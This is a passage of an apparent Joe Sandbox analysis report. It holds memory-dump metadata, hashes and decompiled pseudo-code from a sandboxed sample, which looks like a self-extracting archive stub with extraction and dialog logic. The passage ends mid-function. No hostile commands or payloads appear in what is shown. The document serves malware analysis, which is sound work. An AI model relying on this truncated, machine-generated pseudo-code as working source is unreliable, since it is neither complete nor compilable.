Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: H_prolog_memcmp
String ID:
API String ID: 3004599000-0
Opcode ID: f4b8b43c983eb633fd322d354b70707aa86f9ef82e77bd5fe95ad3cc5cbca47c
Instruction ID: 3a7b0afc1789f07937fcf60d118a64d72ecbaa7d8df1dd3d274b83abfcda362b
Opcode Fuzzy Hash: f4b8b43c983eb633fd322d354b70707aa86f9ef82e77bd5fe95ad3cc5cbca47c
Instruction Fuzzy Hash: C482D57090C245AEDF25DB64C885BFABBE9FF17300F0845FAE949AB542DB315A44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BBEEB3 Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BBEEB3() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00BBEEC0); // executed
				return _t1;
			}

0x00bbeeb8
0x00bbeebe

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_0001EEC0,00BBE905), ref: 00BBEEB8

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: fd5e9974d6b55deeee6749ee2a807e34b150f62eb07502f1de56e79064e085b8
Instruction ID: d3d4f4b5b2d8d7f148095211555dcb7550449d2509612382350bb862f39979cc
Opcode Fuzzy Hash: fd5e9974d6b55deeee6749ee2a807e34b150f62eb07502f1de56e79064e085b8
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00BB65B6 Relevance: .3, Instructions: 325
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E00BB65B6(signed int __ecx, void* __edx, void* __eflags) {
				void* __ebp;
				signed int _t161;
				intOrPtr _t164;
				signed int _t170;
				signed int _t171;
				signed int _t175;
				signed int _t178;
				void* _t181;
				void* _t188;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				signed int _t197;
				signed int _t208;
				signed int _t212;
				intOrPtr _t213;
				signed int _t216;
				signed int _t219;
				signed int _t223;
				signed int _t225;
				signed int _t226;
				intOrPtr* _t232;
				void* _t238;
				signed int _t240;
				signed int _t241;
				intOrPtr _t245;
				intOrPtr _t247;
				signed int _t257;
				intOrPtr* _t259;
				signed int _t260;
				signed int _t263;
				intOrPtr* _t267;
				intOrPtr _t268;
				void* _t269;
				signed int _t270;
				void* _t272;
				signed int _t273;
				void* _t274;
				void* _t276;

				_t216 = __ecx; // executed
				E00BB2DDD(__ecx, __edx); // executed
				E00BB4621(__ecx,  *((intOrPtr*)(_t274 + 0x238)));
				_t240 = 0;
				if( *(_t216 + 0x1c) +  *(_t216 + 0x1c) != 0) {
					_t238 = 0;
					do {
						_t213 =  *((intOrPtr*)(_t216 + 0x18));
						_t238 = _t238 + 0x4ae4;
						_t240 = _t240 + 1;
						 *((char*)(_t213 + _t238 - 0x13)) = 0;
						 *((char*)(_t213 + _t238 - 0x11)) = 0;
					} while (_t240 <  *(_t216 + 0x1c) +  *(_t216 + 0x1c));
				}
				_t219 = 5;
				memcpy( *((intOrPtr*)(_t216 + 0x18)) + 0x18, _t216 + 0x8c, _t219 << 2);
				E00BBF300( *((intOrPtr*)(_t216 + 0x18)) + 0x30, _t216 + 0xa0, 0x4a9c);
				_t276 = _t274 + 0x18;
				_t263 = 0;
				 *(_t276 + 0x28) = 0;
				_t268 = 0;
				 *((char*)(_t276 + 0x13)) = 0;
				 *((intOrPtr*)(_t276 + 0x18)) = 0;
				 *((char*)(_t276 + 0x12)) = 0;
				while(1) {
					L4:
					_t161 = E00BAC9AC( *_t216,  *((intOrPtr*)(_t216 + 0x20)) + _t263, 0x00400000 - _t263 & 0xfffffff0);
					 *(_t276 + 0x2c) = _t161;
					if(_t161 < 0) {
						break;
					}
					_t263 = _t263 + _t161;
					 *(_t276 + 0x20) = _t263;
					if(_t263 != 0) {
						if(_t161 <= 0) {
							goto L56;
						} else {
							if(_t263 >= 0x400) {
								L56:
								while(_t268 < _t263) {
									_t225 = 0;
									 *(_t276 + 0x14) =  *(_t276 + 0x14) & 0;
									 *(_t276 + 0x1c) = 0;
									_t170 =  *(_t216 + 0x1c) +  *(_t216 + 0x1c);
									__eflags = _t170;
									if(_t170 != 0) {
										_t245 =  *((intOrPtr*)(_t276 + 0x18));
										_t273 = 0;
										__eflags = 0;
										do {
											_t259 =  *((intOrPtr*)(_t216 + 0x18)) + _t273;
											 *(_t276 + 0x28) = _t225;
											__eflags =  *((char*)(_t259 + 0x4ad3));
											 *_t259 = _t216;
											if( *((char*)(_t259 + 0x4ad3)) == 0) {
												E00BAA6FD(_t259 + 4,  *((intOrPtr*)(_t216 + 0x20)) + _t245);
												_t263 =  *(_t276 + 0x20);
												 *((intOrPtr*)(_t259 + 8)) = 0;
												_t170 = _t263 -  *((intOrPtr*)(_t276 + 0x18));
												__eflags = _t170;
												 *((intOrPtr*)(_t259 + 4)) = 0;
												 *(_t259 + 0x4acc) = _t170;
												if(_t170 != 0) {
													 *((char*)(_t259 + 0x4ad0)) = 0;
													 *((char*)(_t259 + 0x14)) = 0;
													 *((char*)(_t259 + 0x2c)) = 0;
													_t225 =  *(_t276 + 0x1c);
													goto L15;
												}
											} else {
												 *(_t259 + 0x4acc) = _t263;
												L15:
												__eflags =  *(_t276 + 0x2c);
												 *((char*)(_t259 + 0x4ad3)) = 0;
												 *(_t259 + 0x4ae0) = _t225;
												__eflags =  *((char*)(_t259 + 0x14));
												 *((char*)(_t259 + 0x4ad2)) = _t170 & 0xffffff00 |  *(_t276 + 0x2c) == 0x00000000;
												if( *((char*)(_t259 + 0x14)) != 0) {
													L20:
													__eflags =  *((char*)(_t276 + 0x13));
													if( *((char*)(_t276 + 0x13)) != 0) {
														L23:
														 *((char*)(_t259 + 0x4ad1)) = 1;
														 *((char*)(_t276 + 0x13)) = 1;
													} else {
														__eflags =  *((intOrPtr*)(_t259 + 0x18)) - 0x20000;
														if( *((intOrPtr*)(_t259 + 0x18)) > 0x20000) {
															goto L23;
														} else {
															 *(_t276 + 0x14) =  *(_t276 + 0x14) + 1;
														}
													}
													_t273 = _t273 + 0x4ae4;
													_t245 =  *((intOrPtr*)(_t276 + 0x18)) +  *((intOrPtr*)(_t259 + 0x24)) +  *((intOrPtr*)(_t259 + 0x18));
													_t225 = _t225 + 1;
													 *((intOrPtr*)(_t276 + 0x18)) = _t245;
													_t208 = _t263 - _t245;
													__eflags = _t208;
													 *(_t276 + 0x1c) = _t225;
													if(_t208 < 0) {
														L26:
														__eflags = _t208 - 0x400;
														if(_t208 >= 0x400) {
															goto L27;
														}
													} else {
														__eflags =  *((char*)(_t259 + 0x28));
														if( *((char*)(_t259 + 0x28)) == 0) {
															goto L26;
														}
													}
												} else {
													 *((char*)(_t259 + 0x14)) = 1;
													_push(_t259 + 0x18);
													_push(_t259 + 4);
													_t212 = E00BB3731(_t216);
													__eflags = _t212;
													if(_t212 == 0) {
														L29:
														 *((char*)(_t276 + 0x12)) = 1;
													} else {
														__eflags =  *((char*)(_t259 + 0x29));
														if( *((char*)(_t259 + 0x29)) != 0) {
															L19:
															_t225 =  *(_t276 + 0x1c);
															 *((char*)(_t216 + 0xe662)) = 1;
															goto L20;
														} else {
															__eflags =  *((char*)(_t216 + 0xe662));
															if( *((char*)(_t216 + 0xe662)) == 0) {
																goto L29;
															} else {
																goto L19;
															}
														}
													}
												}
											}
											goto L30;
											L27:
											_t170 =  *(_t216 + 0x1c) +  *(_t216 + 0x1c);
											__eflags = _t225 - _t170;
										} while (_t225 < _t170);
									}
									L30:
									_t226 =  *(_t276 + 0x14);
									_t171 = _t226;
									_t257 = _t171 /  *(_t216 + 0x1c);
									__eflags = _t171 %  *(_t216 + 0x1c);
									if(_t171 %  *(_t216 + 0x1c) != 0) {
										_t257 = _t257 + 1;
										__eflags = _t257;
									}
									_t269 = 0;
									__eflags = _t226;
									if(_t226 != 0) {
										_t247 = 0;
										_t267 = _t276 + 0x34;
										_t195 = _t257 * 0x4ae4;
										__eflags = _t195;
										 *((intOrPtr*)(_t276 + 0x24)) = 0;
										 *(_t276 + 0x30) = _t195;
										do {
											_t232 = _t267;
											_t248 = _t247 +  *((intOrPtr*)(_t216 + 0x18));
											_t197 =  *(_t276 + 0x14) - _t269;
											_t267 = _t267 + 8;
											 *_t232 = _t247 +  *((intOrPtr*)(_t216 + 0x18));
											__eflags = _t257 - _t197;
											if(_t257 < _t197) {
												_t197 = _t257;
											}
											__eflags =  *(_t276 + 0x1c) - 1;
											 *(_t232 + 4) = _t197;
											if( *(_t276 + 0x1c) != 1) {
												E00BB074F( *((intOrPtr*)(_t216 + 0x14)), E00BB7000, _t232);
											} else {
												E00BB69EB(_t216, _t248);
											}
											_t269 = _t269 + _t257;
											_t247 =  *((intOrPtr*)(_t276 + 0x24)) +  *(_t276 + 0x30);
											 *((intOrPtr*)(_t276 + 0x24)) = _t247;
											__eflags = _t269 -  *(_t276 + 0x14);
										} while (_t269 <  *(_t276 + 0x14));
										_t263 =  *(_t276 + 0x20);
									}
									_t270 =  *(_t276 + 0x1c);
									__eflags = _t270;
									if(_t270 == 0) {
										_t268 =  *((intOrPtr*)(_t276 + 0x18));
										goto L68;
									} else {
										E00BB09A1( *((intOrPtr*)(_t216 + 0x14)));
										 *(_t276 + 0x14) = 0;
										__eflags = _t270;
										if(_t270 == 0) {
											L52:
											_t175 =  *((intOrPtr*)(_t276 + 0x12));
											goto L53;
										} else {
											_t260 = 0;
											__eflags = 0;
											do {
												_t272 =  *((intOrPtr*)(_t216 + 0x18)) + _t260;
												__eflags =  *((char*)(_t272 + 0x4ad1));
												if( *((char*)(_t272 + 0x4ad1)) != 0) {
													L47:
													_t178 = E00BB702F(_t216, _t272);
													__eflags = _t178;
													if(_t178 != 0) {
														goto L48;
													}
												} else {
													_t194 = E00BB318A(_t216, _t272);
													__eflags = _t194;
													if(_t194 != 0) {
														__eflags =  *((char*)(_t272 + 0x4ad1));
														if( *((char*)(_t272 + 0x4ad1)) == 0) {
															L48:
															__eflags =  *((char*)(_t272 + 0x4ad0));
															if( *((char*)(_t272 + 0x4ad0)) == 0) {
																__eflags =  *((char*)(_t272 + 0x4ad3));
																if( *((char*)(_t272 + 0x4ad3)) != 0) {
																	_t230 =  *((intOrPtr*)(_t216 + 0x20));
																	_t181 =  *((intOrPtr*)(_t272 + 0x10)) -  *((intOrPtr*)(_t216 + 0x20)) +  *(_t272 + 4);
																	__eflags = _t263 - _t181;
																	if(_t263 > _t181) {
																		_t263 = _t263 - _t181;
																		 *(_t276 + 0x2c) = _t263;
																		E00BC16C0(_t230, _t181 + _t230, _t263);
																		_t276 = _t276 + 0xc;
																		 *((intOrPtr*)(_t272 + 0x18)) =  *((intOrPtr*)(_t272 + 0x18)) +  *(_t272 + 0x20) -  *(_t272 + 4);
																		 *(_t272 + 0x24) =  *(_t272 + 0x24) & 0x00000000;
																		 *(_t272 + 0x20) =  *(_t272 + 0x20) & 0x00000000;
																		 *(_t272 + 4) =  *(_t272 + 4) & 0x00000000;
																		 *((intOrPtr*)(_t272 + 0x10)) =  *((intOrPtr*)(_t216 + 0x20));
																		__eflags =  *(_t276 + 0x14);
																		if( *(_t276 + 0x14) != 0) {
																			_t188 =  *((intOrPtr*)(_t216 + 0x18));
																			E00BBF300(_t188, _t272, 0x4ae4);
																			 *((intOrPtr*)( *((intOrPtr*)(_t216 + 0x18)) + 0x4ad4)) =  *((intOrPtr*)(_t188 + 0x4ad4));
																			_t263 =  *(_t276 + 0x2c);
																			 *((intOrPtr*)( *((intOrPtr*)(_t216 + 0x18)) + 0x4adc)) =  *((intOrPtr*)(_t188 + 0x4adc));
																			 *((char*)(_t272 + 0x4ad3)) = 0;
																			goto L62;
																		}
																		goto L63;
																	}
																} else {
																	__eflags =  *((char*)(_t272 + 0x28));
																	if( *((char*)(_t272 + 0x28)) != 0) {
																		_t175 = 1;
																		 *((char*)(_t276 + 0x12)) = 1;
																		L53:
																		__eflags = _t175;
																		if(_t175 == 0) {
																			_t268 =  *((intOrPtr*)(_t276 + 0x18));
																			_t263 = _t263 - _t268;
																			__eflags = _t263 - 0x400;
																			if(_t263 < 0x400) {
																				__eflags = _t263;
																				if(__eflags >= 0) {
																					if(__eflags <= 0) {
																						L63:
																						_t268 = 0;
																						 *((intOrPtr*)(_t276 + 0x18)) = 0;
																						L68:
																						__eflags =  *((char*)(_t276 + 0x12));
																						if( *((char*)(_t276 + 0x12)) == 0) {
																							goto L4;
																						}
																					} else {
																						E00BC16C0( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)) + _t268, _t263);
																						L62:
																						_t276 = _t276 + 0xc;
																						goto L63;
																					}
																				}
																			} else {
																				_t263 =  *(_t276 + 0x20);
																				goto L56;
																			}
																		}
																	} else {
																		goto L51;
																	}
																}
															}
														} else {
															goto L47;
														}
													}
												}
												goto L69;
												L51:
												_t260 = _t260 + 0x4ae4;
												_t193 =  *(_t276 + 0x14) + 1;
												 *(_t276 + 0x14) = _t193;
												__eflags = _t193 -  *(_t276 + 0x1c);
											} while (_t193 <  *(_t276 + 0x1c));
											goto L52;
										}
									}
									goto L69;
								}
							}
							continue;
						}
					}
					break;
				}
				L69:
				 *(_t216 + 0x7c) =  *(_t216 + 0x7c) &  *(_t216 + 0xe6dc);
				E00BB4B23(_t216);
				_t241 =  *(_t276 + 0x28) * 0x4ae4;
				_t164 =  *((intOrPtr*)(_t216 + 0x18));
				_t223 = 5;
				__eflags = _t164 + _t241 + 0x30;
				return E00BBF300(memcpy(_t216 + 0x8c, _t241 + 0x18 + _t164, _t223 << 2), _t164 + _t241 + 0x30, 0x4a9c);
			}

0x00bb65c0
0x00bb65c2
0x00bb65d0
0x00bb65d8
0x00bb65dc
0x00bb65de
0x00bb65e0
0x00bb65e0
0x00bb65e3
0x00bb65e9
0x00bb65ea
0x00bb65ef
0x00bb65f9
0x00bb65e0
0x00bb6608
0x00bb6618
0x00bb6621
0x00bb6628
0x00bb662b
0x00bb662d
0x00bb6631
0x00bb6633
0x00bb6637
0x00bb663b
0x00bb663f
0x00bb663f
0x00bb6652
0x00bb6657
0x00bb665d
0x00000000
0x00000000
0x00bb6663
0x00bb6665
0x00bb6669
0x00bb6671
0x00000000
0x00bb6677
0x00bb667d
0x00000000
0x00bb68d3
0x00bb6687
0x00bb6689
0x00bb668d
0x00bb6691
0x00bb6691
0x00bb6693
0x00bb6699
0x00bb669d
0x00bb669d
0x00bb669f
0x00bb66a2
0x00bb66a4
0x00bb66a8
0x00bb66af
0x00bb66b1
0x00bb66c4
0x00bb66c9
0x00bb66d1
0x00bb66d4
0x00bb66d4
0x00bb66d8
0x00bb66db
0x00bb66e1
0x00bb66e7
0x00bb66ed
0x00bb66f0
0x00bb66f3
0x00000000
0x00bb66f3
0x00bb66b3
0x00bb66b3
0x00bb66f7
0x00bb66f7
0x00bb66fc
0x00bb6706
0x00bb670c
0x00bb6710
0x00bb6716
0x00bb6749
0x00bb6749
0x00bb674e
0x00bb675f
0x00bb675f
0x00bb6766
0x00bb6750
0x00bb6750
0x00bb6757
0x00000000
0x00bb6759
0x00bb6759
0x00bb6759
0x00bb6757
0x00bb676e
0x00bb677b
0x00bb677d
0x00bb6780
0x00bb6784
0x00bb6784
0x00bb6786
0x00bb678a
0x00bb6792
0x00bb6792
0x00bb6797
0x00000000
0x00000000
0x00bb678c
0x00bb678c
0x00bb6790
0x00000000
0x00000000
0x00bb6790
0x00bb6718
0x00bb671b
0x00bb671f
0x00bb6725
0x00bb6726
0x00bb672b
0x00bb672d
0x00bb67a8
0x00bb67a8
0x00bb672f
0x00bb672f
0x00bb6733
0x00bb673e
0x00bb673e
0x00bb6742
0x00000000
0x00bb6735
0x00bb6735
0x00bb673c
0x00000000
0x00000000
0x00000000
0x00000000
0x00bb673c
0x00bb6733
0x00bb672d
0x00bb6716
0x00000000
0x00bb6799
0x00bb679c
0x00bb679e
0x00bb679e
0x00bb67a6
0x00bb67ad
0x00bb67ad
0x00bb67b3
0x00bb67b8
0x00bb67ba
0x00bb67bc
0x00bb67be
0x00bb67be
0x00bb67be
0x00bb67bf
0x00bb67c1
0x00bb67c3
0x00bb67c5
0x00bb67c7
0x00bb67cb
0x00bb67cb
0x00bb67d1
0x00bb67d5
0x00bb67d9
0x00bb67dd
0x00bb67df
0x00bb67e2
0x00bb67e4
0x00bb67e7
0x00bb67e9
0x00bb67eb
0x00bb67ed
0x00bb67ed
0x00bb67ef
0x00bb67f4
0x00bb67f7
0x00bb680c
0x00bb67f9
0x00bb67fc
0x00bb67fc
0x00bb6815
0x00bb6817
0x00bb681b
0x00bb681f
0x00bb681f
0x00bb6825
0x00bb6825
0x00bb6829
0x00bb682d
0x00bb682f
0x00bb698a
0x00000000
0x00bb6835
0x00bb6838
0x00bb683f
0x00bb6843
0x00bb6845
0x00bb68b1
0x00bb68b1
0x00000000
0x00bb6847
0x00bb6847
0x00bb6847
0x00bb6849
0x00bb684c
0x00bb684e
0x00bb6855
0x00bb6870
0x00bb6873
0x00bb6878
0x00bb687a
0x00000000
0x00000000
0x00bb6857
0x00bb685a
0x00bb685f
0x00bb6861
0x00bb6867
0x00bb686e
0x00bb6880
0x00bb6880
0x00bb6887
0x00bb688d
0x00bb6894
0x00bb68eb
0x00bb68f0
0x00bb68f3
0x00bb68f5
0x00bb68fb
0x00bb6902
0x00bb6906
0x00bb690e
0x00bb6914
0x00bb6917
0x00bb691b
0x00bb6922
0x00bb6926
0x00bb692d
0x00bb692f
0x00bb6931
0x00bb6947
0x00bb694f
0x00bb6958
0x00bb695c
0x00bb6962
0x00000000
0x00bb6962
0x00000000
0x00bb692f
0x00bb6896
0x00bb6896
0x00bb689a
0x00bb68e0
0x00bb68e2
0x00bb68b5
0x00bb68b5
0x00bb68b7
0x00bb68bd
0x00bb68c1
0x00bb68c3
0x00bb68c9
0x00bb6974
0x00bb6976
0x00bb6978
0x00bb696c
0x00bb696c
0x00bb696e
0x00bb698e
0x00bb698e
0x00bb6993
0x00000000
0x00000000
0x00bb697a
0x00bb6983
0x00bb6969
0x00bb6969
0x00000000
0x00bb6969
0x00bb6978
0x00bb68cf
0x00bb68cf
0x00000000
0x00bb68cf
0x00bb68c9
0x00000000
0x00000000
0x00000000
0x00bb689a
0x00bb6894
0x00000000
0x00000000
0x00000000
0x00bb686e
0x00bb6861
0x00000000
0x00bb689c
0x00bb68a0
0x00bb68a6
0x00bb68a7
0x00bb68ab
0x00bb68ab
0x00000000
0x00bb6849
0x00bb6845
0x00000000
0x00bb682f
0x00bb68db
0x00000000
0x00bb667d
0x00bb6671
0x00000000
0x00bb6669
0x00bb6999
0x00bb69a1
0x00bb69a4
0x00bb69a9
0x00bb69b7
0x00bb69bc
0x00bb69ca
0x00bb69e8

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: dd5aa9d8b38482a436a164f6cd5b6b7df9ccd552d3f9c7063833fd9b9a678ea0
Instruction ID: 5be32598f1359503c144e7ab620013c12a690414d1078a460cb71e9afc550020
Opcode Fuzzy Hash: dd5aa9d8b38482a436a164f6cd5b6b7df9ccd552d3f9c7063833fd9b9a678ea0
Instruction Fuzzy Hash: D9D1E5B16043418FDB14DF29C8807EABBE0EF95308F0805ADE9859B242D7B8ED55CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00BBAE20 Relevance: 100.5, APIs: 47, Strings: 10, Instructions: 724
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00BBAE20(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				void* __ebx;
				void* __esi;
				long _t105;
				long _t106;
				struct HWND__* _t107;
				struct HWND__* _t111;
				void* _t114;
				void* _t115;
				int _t116;
				void* _t133;
				void* _t137;
				signed int _t149;
				void* _t166;
				int _t169;
				void* _t182;
				void* _t189;
				void* _t190;
				long _t195;
				void* _t220;
				signed int _t230;
				void* _t231;
				int _t246;
				long _t247;
				long _t248;
				long _t249;
				signed int _t256;
				WCHAR* _t257;
				int _t261;
				int _t263;
				void* _t268;
				void* _t272;
				signed short _t277;
				int _t279;
				WCHAR* _t288;
				WCHAR* _t290;
				intOrPtr _t292;
				void* _t301;
				int _t302;
				struct HWND__* _t304;
				intOrPtr _t307;
				void* _t308;
				struct HWND__* _t309;
				void* _t311;
				struct HWND__* _t313;
				long _t314;
				struct HWND__* _t315;
				void* _t316;
				void* _t317;
				void* _t319;
				void* _t320;
				void* _t322;

				_t301 = __edx;
				_t287 = __ecx;
				E00BBE0E4(E00BD1E7E, _t320);
				E00BBE1C0();
				_t277 =  *(_t320 + 0x10);
				_t307 =  *((intOrPtr*)(_t320 + 0xc));
				_t304 =  *(_t320 + 8);
				if(E00BA130B(_t301, _t304, _t307, _t277,  *((intOrPtr*)(_t320 + 0x14)), L"STARTDLG", 0, 0) == 0) {
					_t308 = _t307 - 0x110;
					__eflags = _t308;
					if(__eflags == 0) {
						_push(_t304);
						E00BBCBAE(_t287, _t301, __eflags, __fp0);
						_t105 =  *0xbeb574;
						_t279 = 1;
						 *0xbe7448 = _t304;
						 *0xbe7438 = _t304;
						__eflags = _t105;
						if(_t105 != 0) {
							SendMessageW(_t304, 0x80, 1, _t105); // executed
						}
						_t106 =  *0xbf5b74;
						__eflags = _t106;
						if(_t106 != 0) {
							SendDlgItemMessageW(_t304, 0x6c, 0x172, 0, _t106); // executed
						}
						_t107 = GetDlgItem(_t304, 0x68);
						 *(_t320 - 0x14) = _t107;
						SendMessageW(_t107, 0x435, 0, 0x400000);
						E00BB9D58(_t320 - 0x1174, 0x800);
						_t111 = GetDlgItem(_t304, 0x66);
						__eflags =  *0xbe9472;
						_t309 = _t111;
						 *(_t320 - 0x18) = _t309;
						_t288 = 0xbe9472;
						if( *0xbe9472 == 0) {
							_t288 = _t320 - 0x1174;
						}
						SetWindowTextW(_t309, _t288);
						E00BBA245(_t309); // executed
						_push(0xbe7454);
						_push(0xbe7450);
						_push(0xbfcc88);
						_push(_t304);
						 *0xbe7446 = 0; // executed
						_t114 = E00BBA712(_t288, _t301, __eflags); // executed
						__eflags = _t114;
						if(_t114 == 0) {
							 *0xbe7441 = _t279;
						}
						__eflags =  *0xbe7454;
						if( *0xbe7454 > 0) {
							_push(7);
							_push( *0xbe7450);
							_push(_t304);
							E00BBBD35(_t301);
						}
						__eflags =  *0xbfdc90;
						if( *0xbfdc90 == 0) {
							SetDlgItemTextW(_t304, 0x6b, E00BADD11(_t288, 0xbf));
							SetDlgItemTextW(_t304, _t279, E00BADD11(_t288, 0xbe));
						}
						__eflags =  *0xbe7454;
						if( *0xbe7454 <= 0) {
							L103:
							__eflags =  *0xbe7446;
							if( *0xbe7446 != 0) {
								L114:
								__eflags =  *0xbe946c - 2;
								if( *0xbe946c == 2) {
									EnableWindow(_t309, 0);
								}
								__eflags =  *0xbe8468;
								if( *0xbe8468 != 0) {
									E00BA12C8(_t304, 0x67, 0);
									E00BA12C8(_t304, 0x66, 0);
								}
								_t115 =  *0xbe946c;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags =  *0xbe7447;
									if( *0xbe7447 == 0) {
										_push(0);
										_push(_t279);
										_push(0x111);
										_push(_t304);
										__eflags = _t115 - _t279;
										if(_t115 != _t279) {
											 *0xc010b8();
										} else {
											SendMessageW(); // executed
										}
									}
								}
								__eflags =  *0xbe7441;
								if( *0xbe7441 != 0) {
									SetDlgItemTextW(_t304, _t279, E00BADD11(_t288, 0x90));
								}
								goto L125;
							}
							__eflags =  *0xbfcc7c;
							if( *0xbfcc7c != 0) {
								goto L114;
							}
							__eflags =  *0xbe946c;
							if( *0xbe946c != 0) {
								goto L114;
							}
							__eflags = 0;
							_t311 = 0xaa;
							 *((short*)(_t320 - 0x9698)) = 0;
							do {
								__eflags = _t311 - 0xaa;
								if(_t311 != 0xaa) {
									L109:
									__eflags = _t311 - 0xab;
									if(__eflags != 0) {
										L111:
										E00BAFD6E(__eflags, _t320 - 0x9698, " ", 0x2000);
										E00BAFD6E(__eflags, _t320 - 0x9698, E00BADD11(_t288, _t311), 0x2000);
										goto L112;
									}
									__eflags =  *0xbfdc90;
									if(__eflags != 0) {
										goto L112;
									}
									goto L111;
								}
								__eflags =  *0xbfdc90;
								if( *0xbfdc90 == 0) {
									goto L112;
								}
								goto L109;
								L112:
								_t311 = _t311 + 1;
								__eflags = _t311 - 0xb0;
							} while (__eflags <= 0);
							_t288 =  *0xbe7458; // 0x0
							E00BB95B5(_t288, __eflags,  *0xbdfed4,  *(_t320 - 0x14), _t320 - 0x9698, 0, 0);
							_t309 =  *(_t320 - 0x18);
							goto L114;
						} else {
							_push(0);
							_push( *0xbe7450);
							_push(_t304); // executed
							E00BBBD35(_t301); // executed
							_t133 =  *0xbfcc7c;
							__eflags = _t133;
							if(_t133 != 0) {
								__eflags =  *0xbe946c;
								if(__eflags == 0) {
									_t290 =  *0xbe7458; // 0x0
									E00BB95B5(_t290, __eflags,  *0xbdfed4,  *(_t320 - 0x14), _t133, 0, 0);
									L00BC340E( *0xbfcc7c);
									_pop(_t288);
								}
							}
							__eflags =  *0xbe946c - _t279;
							if( *0xbe946c == _t279) {
								L102:
								_push(_t279);
								_push( *0xbe7450);
								_push(_t304);
								E00BBBD35(_t301);
								goto L103;
							} else {
								 *0xc010bc(_t304);
								__eflags =  *0xbe946c - _t279;
								if( *0xbe946c == _t279) {
									goto L102;
								}
								__eflags =  *0xbe9471;
								if( *0xbe9471 != 0) {
									goto L102;
								}
								_push(3);
								_push( *0xbe7450);
								_push(_t304);
								E00BBBD35(_t301);
								__eflags =  *0xbfdc88;
								if( *0xbfdc88 == 0) {
									goto L102;
								}
								_t137 = DialogBoxParamW( *0xbdfed4, L"LICENSEDLG", 0, E00BBAC20, 0);
								__eflags = _t137;
								if(_t137 == 0) {
									L25:
									 *0xbe7447 = _t279;
									L26:
									_push(_t279);
									L13:
									 *0xc010ac(_t304); // executed
									L125:
									_t116 = _t279;
									L126:
									 *[fs:0x0] =  *((intOrPtr*)(_t320 - 0xc));
									return _t116;
								}
								goto L102;
							}
						}
					}
					__eflags = _t308 != 1;
					if(_t308 != 1) {
						L7:
						_t116 = 0;
						goto L126;
					}
					_t149 = (_t277 & 0x0000ffff) - 1;
					__eflags = _t149;
					if(_t149 == 0) {
						__eflags =  *0xbe7440;
						if( *0xbe7440 != 0) {
							L23:
							GetDlgItemTextW(_t304, 0x66, _t320 - 0x2174, 0x800);
							__eflags =  *0xbe7440;
							if( *0xbe7440 == 0) {
								__eflags =  *0xbe7441;
								if( *0xbe7441 == 0) {
									_t313 = GetDlgItem(_t304, 0x68);
									__eflags =  *0xbe743c; // 0x0
									if(__eflags == 0) {
